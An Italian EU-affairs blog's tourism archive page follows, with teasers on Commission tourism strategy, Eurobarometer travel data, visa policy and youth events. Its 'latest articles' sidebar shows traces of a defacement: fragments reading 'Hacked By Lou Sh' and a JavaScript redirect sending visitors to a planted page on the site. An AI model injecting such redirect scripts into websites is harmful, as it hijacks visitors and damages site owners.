EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Turismo

Turismo


Turismo

it

Offrire al turista un servizio unico, differenziato e di qualità e nello stesso tempo fronteggiare la concorrenza delle emergenti località turistiche: sono questi gli obiettivi dei nuovi princìpi presentati da Bruxelles per dare un nuovo impulso ad un settore in sofferenza ultimamente. Differenziare l’offerta, garantendo un servizio di qualità, sembra la strada giusta per catturare nuovamente l’attenzione dei consumatori.

Lo scorso 20 febbraio, la Commissione europea ha presentato una serie di nuovi princìpi per migliorare la qualità dei servizi turistici offerti dalle aziende del Vecchio Continente. L’iniziativa della Commissione mira a rendere più allettante il turismo in Europa, ad aumentare i flussi turistici, (...)

it

L’indagine Eurobarometro (PREFERENCES OF EUROPEANS TOWARDS TOURISM) condotta tra il 6 e l’11 gennaio 2014 su 31.122 persone provenienti dai 28 Stati membri e da altri sette paesi fuori dall’Ue, evidenzia che il turismo è stato uno degli asset più forti dell’economia in questo periodo di crisi: nel 2013, il 70% dei cittadini europei ha fatto almeno un pernottamento fuori dal luogo di residenza e soltanto l’11% degli intervistati pensa di non lasciare il proprio paese nel corso dell’anno.

Prendendo atto dell’importanza ricoperta dal settore turistico all’interno dell’Unione europea, la Commissione ha presentato lo scorso 20 febbraio una strategia a sostegno del turismo costiero e marittimo. L’obiettivo principale è quello di creare nuovi posti di lavoro all’interno di questo settore (...)

it

In questo inizio di primavera l'Europa si mette in moto per garantire e potenziare l'afflusso turistico verso i suoi territori.

L’azione concreta attraverso cui si darà il via a questo progetto, proviene dalla task force del Parlamento europeo sul Turismo, capitanata dal coordinatore Carlo Fidanza.

Il parlamentare del PPE ha infatti reso noto l’inserimento in una carta ufficiale, di un’idea che veniva già sollecitata da (...)

it

Il secondo capitolo della relazione analizza gli orientamenti e le priorità nazionali italiane riguardo le più importanti politiche europee. Vengono esaminate l’integrazione del mercato interno e la ripresa della competitività, la dimensione esterna dell'Unione europea, come consolidare lo spazio comune di libertà, la sicurezza, la giustizia e le varie politiche dei settori (agricoltura e pesca, coesione, occupazione e politiche sociali, istruzione e politiche giovanili, industria – comprese energia e trasporti, ambiente, salute, tutela dei consumatori, cultura, turismo, fiscalità).

Una delle principali preoccupazioni per il 2013 è il rilancio del mercato interno. Nel 1992, sotto la guida di Jacques Delors, è stato promosso il libero scambio tra i paesi dell’Ue, attraverso le quattro libertà: libera circolazione di persone, merci, servizi e capitali. La strada per raggiungere (...)

it

Agevolare la concessione dei visti d’ingresso nell’UE per facilitare la crescita dei flussi turistici, sostenere lo sviluppo economico e la creazione di posti di lavoro ma senza rinunciare alla sicurezza: questo in sintesi, l’obiettivo della comunicazione che vuole dare stimoli ad un settore come quello del turismo che nel 2011 ha garantito 18,8 milioni di posti di lavoro in Europa, diventando una delle principali fonti di occupazione nell’Unione ed un importantissimo motore di crescita economica e sviluppo. Nel 2022 dovrebbe, secondo le previsioni, assicurane 20,4 milioni.

Gli importi spesi da stranieri nel 2011 sono stati pari a 330,44 miliardi di euro che, nel 2022, diventeranno 427,31 miliardi. Secondo i dati dell’Esecutivo UE, il numero di visti rilasciati è in aumento. Nel 2011 infatti si è registrato un incremento soprattutto per le domande provenienti da (...)

it

Alla vigilia dei weekend da “bollino nero” la Commissione europea ha stilato dieci semplici regole per evitare che la vacanza tanto agognata si trasformi in un incubo.

Il Vicepresidente della Commissione europea Antonio Tajani ha presentato il decalogo per il turista europeo, contenente consigli e raccomandazioni rivolti ai cittadini dell’area Ue per viaggiare in totale sicurezza. Tale misura rientra tra le iniziative adottate dalla Commissione per promovere (...)

it

L'Associazione Italiana Alberghi per la Gioventù è un ente istituzionale riconosciuto dall'Onu e membro della Federazione Internazionale degli Ostelli per la Gioventù. Alla base del progetto la necessità di avvicinare i giovani alla cultura.

Nonostante la globalizzazione sia ormai un dato di fatto e le frontiere rappresentino un limite fisico e concettuale ormai sorpassato e dimenticato, si tende ancora a sottovalutare l’importanza ricoperta dalla conoscenza acquisita mediante l’osservazione ’de visu’. Anzi, proprio la diffusione (...)

it

L’idea è nata nel 2009, quando per la prima volta fu assegnato alla città di Rotterdam il titolo di “Capitale Europea della Gioventù”. Da quel momento, ogni anno viene eletta una città, e per un anno, questa ha il compito e l’onore di accogliere questo progetto, mettendo al centro di tutte le sue facoltà, i giovani e il loro futuro.

Viene proclamata “Capitale Europea della gioventù”, per l’anno 2011, Anversa. La città belga ha ricevuto, dal Forum Europeo della Gioventù, il riconoscimento tanto ambito da ogni città Europea. I festeggiamenti sono iniziati tra il 4 e 5 marzo, il Kick-Off Event Club-Centraal, quando nella stazione, (...)

it

Dal 6 al 9 aprile 2011, si terrà a Roma, presso il Salone delle Fontane (EUR), l’ottava edizione del “FareTurismo Italia”. Quattro giornate per formarsi nel mondo del turismo e cogliere opportunità di lavoro.

L’evento organizzato dalla Leader SAS si terrà nella capitale. Ritorna l’iniziativa che cerca di promuovere il lavoro nel mondo del turismo. Occasione per giovani laureandi e specialisti di scoprire qualcosa di più di quello che amano, che studiano, e l’opportunità, forse, di trovare anche una (...)

it

Questo il suggerimento del Commissario per le Politiche regionali dell'Unione europea Johannes Hahn, durante una conferenza stampa sul futuro dei fondi europei.

Il governo dovrebbe utilizzare una parte dei finanziamenti europei destinati alla coesione economica, sociale e territoriale, per avviare un processo di ristrutturazione degli scavi di Pompei e di numerosi altri siti archeologici italiani. Un’indicazione del Commissario europeo Johannes Hahn, (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France